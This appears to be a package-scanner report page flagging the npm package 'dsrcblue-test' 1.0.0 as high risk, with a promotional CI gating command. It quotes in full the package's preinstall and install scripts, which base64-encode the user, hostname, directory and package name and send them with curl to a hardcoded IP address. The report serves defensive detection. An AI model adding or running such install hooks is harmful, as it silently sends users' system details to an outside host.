PkgRadar

npm · registry.npmjs.org

dsrcblue-test

Install Lifecycle Remote Or Exec: preinstall="b64=$(echo \"$(whoami)@$(hostname):$(pwd):$npm_package_name\" | base64 -w0); curl http://10.95.39.53:8085/$b64"

Why PkgRadar flagged 1.0.0

SeveritySignalEvidence
highInstall Lifecycle Remote Or Execpreinstall="b64=$(echo \"$(whoami)@$(hostname):$(pwd):$npm_package_name\" | base64 -w0); curl http://10.95.39.53:8085/$b64" · package.json
highInstall Lifecycle Remote Or Execinstall="b64=$(echo \"$(whoami)@$(hostname):$(pwd):$npm_package_name\" | base64 -w0); curl http://10.95.39.53:8085/$b64" · package.json
highInstall Lifecycle Repeated Payloadpreinstall,install="b64=$(echo \"$(whoami)@$(hostname):$(pwd):$npm_package_name\" | base64 -w0); curl http://10.95.39.53:8085/$b64" · package.json
mediumRemote Payloadmatched "curl " · package/package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
1.0.0High risk1072026-05-27

Block this in CI

PkgRadar gates dsrcblue-test (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]